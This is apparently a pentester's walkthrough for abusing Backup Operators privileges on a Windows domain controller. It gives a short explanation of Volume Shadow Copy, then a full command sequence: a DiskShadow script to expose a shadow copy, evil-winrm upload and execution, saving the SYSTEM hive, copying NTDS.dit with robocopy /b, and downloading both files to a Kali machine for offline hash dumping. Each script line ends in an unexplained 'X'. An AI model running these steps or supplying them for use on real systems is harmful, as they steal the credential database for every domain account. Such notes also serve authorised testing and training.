Membership in the Backup Operators group provides access to the domain controller file system due to the SeBackup and SeRestore privileges. These privileges enable folder traversal, listing, and file copying capabilities, even without explicit permissions, using the FILE_FLAG_BACKUP_SEMANTICS flag. Utilizing specific scripts is necessary for this process.
This means Backup Operators can backup the DC’s hard drive, make a copy of NTDS.dit and the system registry hive from the backup, and then move both files offline and dump hashes.
<aside> ℹ️ Shadow Copy, also known as VSS, is that feature available in Microsoft Windows operating systems (both Client and Server) that allows instant chronological saves (snapshots) of files and folders in the volumes of our computers, even when the files are in use. The Shadow Copy function is delivered through the Windows service called Volume Shadow Copy Service or in the case of use by Windows applications Provider VSS.
The process is structured in two steps, the first handled by the “Volume Shadow Copy” service that initiates and governs the process of creating the chronological snapshot and the second through the “Provider VSS” service that handles the actual data transfer.
When a backup is created using the Shadow Copy feature, a version control method is used so that only changes to files are backed up instead of the entire file. Therefore, many versions of a given file may be available without taking up too much disk space.
This is normally a feature that is skilled on volumes shared with multiple users, scenarios in which deletion or modification of information, whether accidental or intentional, is frequent. For example, a file server.
DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). This binary has two modes interactive and script and therefore a script file can be used that will contain all the necessary commands to automate the process of NTDS.DIT extraction. The script file can contain the following lines in order to create a new volume shadow copy, mount a new drive, execute the copy command and delete the volume shadow copy.
</aside>
From Linux machine create a backup.txt file containing these commands:
set verbose onX
set metadata C:\\Windows\\Temp\\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backup
From a remote session on target machine (i.e. using evil-winrm) run these commands:
mkdir C:\\Temp
cd C:\\Temp
upload /<PATH-TO-BACKUP.TXT>/backup.txt
diskshadow /s backup.txt
The SYSTEM registry hive should be copied as well since it contains the key to decrypt the contents of the NTDS file:
reg save hklm\\system c:\\temp\\system
once that’s done, copy the NTDS.dit and system registry hive locally on attacker machine:
robocopy /b E:\\Windows\\ntds . ntds.dit
download ntds.dit /home/kali/Downloads/ntds.dit
download C:\\Temp\\system /home/kali/Downloads/system